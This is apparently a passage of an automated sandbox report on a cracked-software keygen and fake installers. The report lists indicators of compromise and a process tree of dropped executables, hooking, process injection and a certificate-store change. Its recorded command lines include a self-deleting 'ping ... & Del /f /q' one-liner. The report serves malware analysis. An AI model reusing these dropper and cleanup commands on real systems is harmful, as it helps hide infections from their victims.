e650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-6.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 109 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 323 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1014 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
CrowdInspect64.exepid process 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
CrowdInspect64.exeexplorer.exetaskmgr.exepid process 2200 CrowdInspect64.exe 8472 explorer.exe 7916 taskmgr.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
TS8C7UyMm7f4cONqJ7WGeWsJ.exed2pWMSMuJC2SPxoArZghL_Tl.exedwy8rW6Lldk0o1PoYRnRbG17.exepid process 2416 TS8C7UyMm7f4cONqJ7WGeWsJ.exe 5108 d2pWMSMuJC2SPxoArZghL_Tl.exe 3512 dwy8rW6Lldk0o1PoYRnRbG17.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
2916297.exe6733372.exe7676489.exepid process 8968 2916297.exe 7292 6733372.exe 8912 7676489.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeCrowdInspect64.exedescription pid process Token: SeDebugPrivilege 3812 MicrosoftEdge.exe Token: SeDebugPrivilege 3812 MicrosoftEdge.exe Token: SeDebugPrivilege 3812 MicrosoftEdge.exe Token: SeDebugPrivilege 3812 MicrosoftEdge.exe Token: SeDebugPrivilege 3812 MicrosoftEdge.exe Token: SeDebugPrivilege 1960 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1960 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1960 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1960 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe Token: SeDebugPrivilege 2200 CrowdInspect64.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
CrowdInspect64.exepid process 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe 2200 CrowdInspect64.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
explorer.exetaskmgr.exepid process 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 7916 taskmgr.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe 8472 explorer.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
malware.exeCrowdInspect.exeCrowdInspect64.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeSetup.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeTue130c270d23c79.exeG9glq53LJPiE8StANY6HSQ0T.exeTS8C7UyMm7f4cONqJ7WGeWsJ.exeH0CeEMPSUFWGICASTuD05aaY.exedds4TfzYp9QVoKSZWjdvpOap.exeCalculator.exeRmlYM6m_MkNIs4hsfQ2xhK0w.exeTue13a47d89c50.exeTue13c1be0d8f62bc.exe0bB8aprULCmL4OW0bMY9mihf.exeTue13bbed6e0bb6.exeVDrYzJIhYBfsOxUVjD6qOlHo.exeY59NcCyhjTNabUyy_rSrn88j.exe7KAQ13EUayjF7l_ONZLsO4KC.exeTue132b1547125d9.exeTue13a98da3f882e5.exeTue136037e6ffe49ce8.exeCrowdInspect64.execuDHLwVUXRBFsKiCmh1izlnZ.exezCXMiv3RosvYx3Ad7qwEftH6.exeCwkpDrSvORlcHiAeld52hPsK.exeTue13bd9cb08d6.exeTue136037e6ffe49ce8.tmpFhLKl5cj19hUvdWkcqQyDNUv.exedHTl_RtE2hNmhOES7j1a4rLs.executm3.exeinst3.exeTue136037e6ffe49ce8.exeTue136037e6ffe49ce8.tmppostback.exeGn5frZPIHvGjfBwF7Il2mnlk.exesvchost.exec1dNg7rmL7AM4CiqKD1oZyCX.exeuf2t2oDZV5LRLSSN6Hb8voFZ.exeConhost.exeh7pNaKg1Ramme0ohTtFbfQ3J.exeinst1.exeOybdv6qraCYyAyUtgT3A9cef.exeConhost.exeDLjV2s2ueZon3CTM60lS0VWW.exeByaHAL6bgI2pbhcsOF924P3v.exeeZsF2OWRzuzNuvlJWHEsjxQF.exeaaaSPc2PtzvTAeDTpwDSd3PG.exeM0B7OzUpFvRryaEWM29BOKgd.exeTGtAEWLljVxWkvq1xb8Zi2ek.exeSoft1WW02.exerMgcMIG5CYTFm8oA7NLdsKUX.exebLCqLbeoS1vk6HwFKoG1WPni.exesetup.exed2pWMSMuJC2SPxoArZghL_Tl.exe8P083V8LTI37jEjio3MwZLjf.exesetup_2.exe8.exepid process 1796 malware.exe 1796 malware.exe 2444 CrowdInspect.exe 2200 CrowdInspect64.exe 3812 MicrosoftEdge.exe 3452 MicrosoftEdgeCP.exe 3452 MicrosoftEdgeCP.exe 2120 Setup.exe 2968 setup_x86_x64_install.exe 3076 setup_installer.exe 2796 setup_install.exe 3976 Tue130c270d23c79.exe 4220 G9glq53LJPiE8StANY6HSQ0T.exe 4204 TS8C7UyMm7f4cONqJ7WGeWsJ.exe 4196 H0CeEMPSUFWGICASTuD05aaY.exe 4232 dds4TfzYp9QVoKSZWjdvpOap.exe 4304 Calculator.exe 4316 RmlYM6m_MkNIs4hsfQ2xhK0w.exe 4432 Tue13a47d89c50.exe 4444 Tue13c1be0d8f62bc.exe 4480 0bB8aprULCmL4OW0bMY9mihf.exe 4420 Tue13bbed6e0bb6.exe 2292 VDrYzJIhYBfsOxUVjD6qOlHo.exe 2916 Y59NcCyhjTNabUyy_rSrn88j.exe 4764 7KAQ13EUayjF7l_ONZLsO4KC.exe 4876 Tue132b1547125d9.exe 360 Tue13a98da3f882e5.exe 4128 Tue136037e6ffe49ce8.exe 1200 CrowdInspect64.exe 4832 cuDHLwVUXRBFsKiCmh1izlnZ.exe 1412 zCXMiv3RosvYx3Ad7qwEftH6.exe 1380 CwkpDrSvORlcHiAeld52hPsK.exe 4544 Tue13bd9cb08d6.exe 2380 Tue136037e6ffe49ce8.tmp 4604 FhLKl5cj19hUvdWkcqQyDNUv.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 5984 cutm3.exe 6036 inst3.exe 4820 Tue136037e6ffe49ce8.exe 5372 Tue136037e6ffe49ce8.tmp 3144 postback.exe 6616 Gn5frZPIHvGjfBwF7Il2mnlk.exe 6572 svchost.exe 6668 c1dNg7rmL7AM4CiqKD1oZyCX.exe 6748 uf2t2oDZV5LRLSSN6Hb8voFZ.exe 6924 Conhost.exe 7028 h7pNaKg1Ramme0ohTtFbfQ3J.exe 6352 inst1.exe 6332 Oybdv6qraCYyAyUtgT3A9cef.exe 4332 Conhost.exe 6384 DLjV2s2ueZon3CTM60lS0VWW.exe 6364 ByaHAL6bgI2pbhcsOF924P3v.exe 5184 eZsF2OWRzuzNuvlJWHEsjxQF.exe 6428 aaaSPc2PtzvTAeDTpwDSd3PG.exe 5096 M0B7OzUpFvRryaEWM29BOKgd.exe 7004 TGtAEWLljVxWkvq1xb8Zi2ek.exe 4700 Soft1WW02.exe 6476 rMgcMIG5CYTFm8oA7NLdsKUX.exe 1496 bLCqLbeoS1vk6HwFKoG1WPni.exe 5500 setup.exe 4960 d2pWMSMuJC2SPxoArZghL_Tl.exe 2308 8P083V8LTI37jEjio3MwZLjf.exe 6244 setup_2.exe 5864 8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
CrowdInspect.exeCity_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.execmd.exekeygen-pr.exekeygen-step-4.exekey.exekeygen-step-3.execmd.exeSetup.exerundll32.exerundll32.exesvchost.exesetup_x86_x64_install.exesetup_installer.exedescription pid process target process PID 2444 wrote to memory of 2200 2444 CrowdInspect.exe CrowdInspect64.exe PID 2444 wrote to memory of 2200 2444 CrowdInspect.exe CrowdInspect64.exe PID 3128 wrote to memory of 1432 3128 City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe cmd.exe PID 3128 wrote to memory of 1432 3128 City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe cmd.exe PID 3128 wrote to memory of 1432 3128 City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe cmd.exe PID 1432 wrote to memory of 3796 1432 cmd.exe keygen-pr.exe PID 1432 wrote to memory of 3796 1432 cmd.exe keygen-pr.exe PID 1432 wrote to memory of 3796 1432 cmd.exe keygen-pr.exe PID 1432 wrote to memory of 1056 1432 cmd.exe keygen-step-1.exe PID 1432 wrote to memory of 1056 1432 cmd.exe keygen-step-1.exe PID 1432 wrote to memory of 1056 1432 cmd.exe keygen-step-1.exe PID 1432 wrote to memory of 3548 1432 cmd.exe keygen-step-6.exe PID 1432 wrote to memory of 3548 1432 cmd.exe keygen-step-6.exe PID 1432 wrote to memory of 3548 1432 cmd.exe keygen-step-6.exe PID 1432 wrote to memory of 1716 1432 cmd.exe keygen-step-3.exe PID 1432 wrote to memory of 1716 1432 cmd.exe keygen-step-3.exe PID 1432 wrote to memory of 1716 1432 cmd.exe keygen-step-3.exe PID 3796 wrote to memory of 600 3796 keygen-pr.exe key.exe PID 3796 wrote to memory of 600 3796 keygen-pr.exe key.exe PID 3796 wrote to memory of 600 3796 keygen-pr.exe key.exe PID 1432 wrote to memory of 648 1432 cmd.exe keygen-step-4.exe PID 1432 wrote to memory of 648 1432 cmd.exe keygen-step-4.exe PID 1432 wrote to memory of 648 1432 cmd.exe keygen-step-4.exe PID 648 wrote to memory of 2076 648 keygen-step-4.exe Crack.exe PID 648 wrote to memory of 2076 648 keygen-step-4.exe Crack.exe PID 648 wrote to memory of 2076 648 keygen-step-4.exe Crack.exe PID 600 wrote to memory of 1992 600 key.exe key.exe PID 600 wrote to memory of 1992 600 key.exe key.exe PID 600 wrote to memory of 1992 600 key.exe key.exe PID 1716 wrote to memory of 2064 1716 keygen-step-3.exe cmd.exe PID 1716 wrote to memory of 2064 1716 keygen-step-3.exe cmd.exe PID 1716 wrote to memory of 2064 1716 keygen-step-3.exe cmd.exe PID 2064 wrote to memory of 3500 2064 cmd.exe PING.EXE PID 2064 wrote to memory of 3500 2064 cmd.exe PING.EXE PID 2064 wrote to memory of 3500 2064 cmd.exe PING.EXE PID 2120 wrote to memory of 432 2120 Setup.exe QmiWmcaRxjnYchsQZn0ahCpU.exe PID 2120 wrote to memory of 432 2120 Setup.exe QmiWmcaRxjnYchsQZn0ahCpU.exe PID 3664 wrote to memory of 3160 3664 rundll32.exe rundll32.exe PID 3664 wrote to memory of 3160 3664 rundll32.exe rundll32.exe PID 3664 wrote to memory of 3160 3664 rundll32.exe rundll32.exe PID 648 wrote to memory of 1572 648 keygen-step-4.exe md1_1eaf.exe PID 648 wrote to memory of 1572 648 keygen-step-4.exe md1_1eaf.exe PID 648 wrote to memory of 1572 648 keygen-step-4.exe md1_1eaf.exe PID 3160 wrote to memory of 3156 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 2696 3160 rundll32.exe svchost.exe PID 3156 wrote to memory of 2036 3156 svchost.exe svchost.exe PID 3156 wrote to memory of 2036 3156 svchost.exe svchost.exe PID 3156 wrote to memory of 2036 3156 svchost.exe svchost.exe PID 3160 wrote to memory of 312 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 2520 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 2508 3160 rundll32.exe svchost.exe PID 2968 wrote to memory of 3076 2968 setup_x86_x64_install.exe setup_installer.exe PID 2968 wrote to memory of 3076 2968 setup_x86_x64_install.exe setup_installer.exe PID 2968 wrote to memory of 3076 2968 setup_x86_x64_install.exe setup_installer.exe PID 3160 wrote to memory of 1108 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 1028 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 1444 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 1940 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 1256 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 1316 3160 rundll32.exe svchost.exe PID 3160 wrote to memory of 2772 3160 rundll32.exe svchost.exe PID 3076 wrote to memory of 2796 3076 setup_installer.exe setup_install.exe PID 3076 wrote to memory of 2796 3076 setup_installer.exe setup_install.exe PID 3076 wrote to memory of 2796 3076 setup_installer.exe setup_install.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\malware.exe"C:\Users\Admin\AppData\Local\Temp\malware.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe"C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1468698.exe"C:\Users\Admin\AppData\Roaming\1468698.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\3116841.exe"C:\Users\Admin\AppData\Roaming\3116841.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8950614.exe"C:\Users\Admin\AppData\Roaming\8950614.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1597993.exe"C:\Users\Admin\AppData\Roaming\1597993.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\7676489.exe"C:\Users\Admin\AppData\Roaming\7676489.exe"5⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4451536.exe"C:\Users\Admin\AppData\Roaming\4451536.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\pub1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\pub1.exe"4⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\QmiWmcaRxjnYchsQZn0ahCpU.exe"C:\Users\Admin\Pictures\Adobe Films\QmiWmcaRxjnYchsQZn0ahCpU.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dds4TfzYp9QVoKSZWjdvpOap.exe"C:\Users\Admin\Pictures\Adobe Films\dds4TfzYp9QVoKSZWjdvpOap.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 9203⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\G9glq53LJPiE8StANY6HSQ0T.exe"C:\Users\Admin\Pictures\Adobe Films\G9glq53LJPiE8StANY6HSQ0T.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
